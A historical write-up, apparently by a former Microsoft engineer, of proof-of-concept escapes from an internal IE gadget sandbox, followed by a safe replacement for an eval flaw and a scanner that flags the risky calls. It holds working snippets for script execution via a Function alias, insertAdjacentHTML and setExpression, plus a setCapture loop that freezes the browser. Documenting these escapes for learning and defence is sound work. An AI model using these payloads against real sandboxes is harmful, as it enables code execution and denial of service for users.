These proof-of-concepts were written to be pasted into the LiveLabs sandbox environment (an internal IE testing harness at http://131.107.155.233/Samples/genericSample.aspx). The sandbox was supposed to restrict what JavaScript could do, and these snippets probed the edges of those restrictions — finding several ways to execute code, freeze the browser, or break the containing page.
Script Execution via Function Constructor
Based on techniques by Gareth Heyes. Assigning the Function constructor to another name (f = Function) gives an eval equivalent, so arbitrary code can still be compiled and run even when eval itself is restricted.
<html><head><title>PoC Based on Gareth PoCs</title>
</head>
<body>
This PoC is a simplification of all the AMAZING PoCs by Gareth
<script>
f = Function;
f('Object=function(){alert("Hacked: " + document.body.innerHTML)};')();
Object();
</script>
</body>
</html>
Script Execution via insertAdjacentHTML + defer
<html><head><title>Executes using insertAdjacentHTML</title></head>
<body>
<script>
document.body.insertAdjacentHTML('beforeBegin','.<script defer>alert(document.body.innerHTML)<\/script>');
</script>
</body>
</html>
Page Navigation via Link Click
<html><head><title>Changes the Location of the mainPage</title></head>
<body>
<a id="myLink" href = "http://www.google.com" target="_top">Google</a>
<script>
document.all.myLink.click();
</script>
</body>
</html>
Sandbox Freezer via setCapture
Once triggered, setCapture prevented any mouse interaction with the entire browser window, including other tabs, until focus was moved away from the browser.
<html><head><title>setCapture Freezes interaction with all Gadgets on the page</title></head>
<body>
The setCapture method freezes the browser window until you press the right mouse button or unfocus the browser window. <br />
That means, interfering with the usage of other Gadgets. If we add a setInterval to that... the Browser ends up being unusable. All the TABS.<br /><br />
<input type="button" value="Freeze Browser" onclick="freezeBrowser();"><br /><br />
<script>
function freezeBrowser()
{
setInterval(function(){document.body.setCapture()},10)
}
</script>
</body>
</html>
Script Execution via setExpression
<html><head><title>Executes using setExpression</title></head>
<body>
<script>
document.body.setExpression("width","alert(document.body.innerHTML)");
</script>
</body>
</html>
Style Parser Error Leading to eval Injection
A backslash inside a <style> tag could break the CSS parser in a way that interfered with the sandbox’s internal eval-based style handling in GadgetManager.js.
<html>
<head><title>When placing a \ inside the style, it breaks the eval</title>
<style>A\</style>
</head>
<body>
The style tag with a \ inside will throw an error because the " ends up escaped.
Problem can be found in the GadgetManager.js, here:<br />
if(me.outCSS&&me.outCSS.length>0)eval("settings = { css : "+me.outCSS+" };");
</body>
</html>
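The failing pattern quoted above, beside a replacement that keeps the CSS text out of eval, as an added example that is not code from the page or from GadgetManager.js. The function names and the assumption that outCSS arrives as a double-quoted string spliced in as source text are this example's own.

```javascript
// Added example (not from the original page or from GadgetManager.js).
// Reproduces the failure in the quoted line
//   eval("settings = { css : "+me.outCSS+" };");
// on a backslash, and shows a replacement that never hands the CSS text to
// a code parser. The function names and the assumed shape of outCSS
// (a double-quoted CSS string spliced in as source text) are this example's.

// The quoted pattern, wrapped in a function so it can be called with input.
function buildSettingsWithEval(outCSS) {
  var settings;
  eval("settings = { css : " + outCSS + " };");
  return settings;
}

// Calls the eval-based builder and reports the outcome as a string, so the
// failure mode is visible instead of being an uncaught exception.
function tryEvalBuild(outCSS) {
  try {
    return buildSettingsWithEval(outCSS).css;
  } catch (e) {
    return "error: " + e.name;
  }
}

// Hardened replacement: the CSS is data, so build the object directly.
// No parser runs over it, so no character in the stylesheet can alter the
// structure of the statement that creates the settings object.
function buildSettingsSafe(cssText) {
  return { css: cssText };
}

// If the string must be serialised for transport and restored later, use JSON
// on both ends: stringify escapes backslashes and quotes correctly, and parse
// never executes anything.
function serialiseCss(cssText) {
  return JSON.stringify(cssText);
}
function restoreSettings(serialised) {
  return { css: JSON.parse(serialised) };
}

// Constructed sample: the stylesheet body from the PoC ("A\") quoted naively
// with double quotes, as the page describes. The trailing backslash escapes
// the closing quote, leaving the string literal unterminated.
var NAIVELY_QUOTED_CSS = '"A\\"';
var RAW_CSS = "A\\";

// Stand-alone run: the eval outcome beside the safe results.
console.log(tryEvalBuild(NAIVELY_QUOTED_CSS));         // error: SyntaxError
console.log(buildSettingsSafe(RAW_CSS).css);
console.log(restoreSettings(serialiseCss(RAW_CSS)).css);
```

The point of the safe variants is that the stylesheet text only ever travels as a value: the object is built in code, and if serialisation is unavoidable the escaping and unescaping are done by JSON, not by gluing strings into a statement.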
Several of these techniques (the Function alias, insertAdjacentHTML with defer, and setExpression) provided paths to execute arbitrary JavaScript inside the sandbox. The setCapture freezer was a denial-of-service against the entire browser process. The style parser escape was application-specific — it exploited the gadget framework’s use of eval to process CSS strings — a good reminder that sandboxing needs to account for the application layer, not just the browser API surface.
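A small source-review aid that flags the primitives summarised above when they appear in gadget JavaScript, as an added example that is not part of the original page. The pattern names and the sample gadget are constructed here; it is a triage tool for code review, not a security boundary, since the page itself shows that deny-listing API names does not hold.

```javascript
// Added example, not part of the original page: a source-review aid that
// flags the sandbox-escape primitives documented above when they appear in
// gadget JavaScript. Pattern names and the sample gadget are constructed here.

const RISKY_PATTERNS = [
  {
    id: "function-constructor",
    // Any reference to the Function identifier, including aliasing such as
    // "f = Function;". Case-sensitive, so the function keyword is not matched.
    re: /\bFunction\b/,
    why: "Function compiles source text, so it is an eval equivalent",
  },
  {
    id: "script-via-insertAdjacentHTML",
    re: /insertAdjacentHTML\s*\(.*<script\b/i,
    why: "markup passed to insertAdjacentHTML contains a script element",
  },
  {
    id: "setExpression",
    re: /\.setExpression\s*\(/,
    why: "setExpression evaluates its second argument as script",
  },
  {
    id: "setCapture",
    re: /\.setCapture\s*\(/,
    why: "setCapture can lock mouse input for the whole browser window",
  },
];

// Scans one source text line by line and returns every match as
// { id, line, why, text }, in line order. Line numbers are 1-based.
function scanSource(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, index) => {
    for (const pattern of RISKY_PATTERNS) {
      if (pattern.re.test(text)) {
        findings.push({ id: pattern.id, line: index + 1, why: pattern.why, text: text.trim() });
      }
    }
  });
  return findings;
}

// Convenience for a review gate: the distinct pattern ids found in a source.
function riskyIds(source) {
  return [...new Set(scanSource(source).map((f) => f.id))];
}

// Constructed sample gadget combining the page's primitives with a benign line.
const SAMPLE_GADGET = [
  "f = Function;",
  "f('Object=function(){alert(1)};')();",
  "document.body.insertAdjacentHTML('beforeBegin','.<script defer>alert(1)<\\/script>');",
  "document.body.setExpression('width','alert(1)');",
  "setInterval(function(){document.body.setCapture()},10);",
  "var n = document.body.innerHTML.length; // benign",
].join("\n");

// Stand-alone run: one report line per finding.
for (const f of scanSource(SAMPLE_GADGET)) {
  console.log(`line ${f.line}: ${f.id} - ${f.why}`);
}
```

Matching is per line and by identifier, so it is deliberately noisy: a hit means a reviewer should look, not that the gadget is malicious, and a miss means nothing, because the page's own PoCs show how many distinct routes reach the same capability.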
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.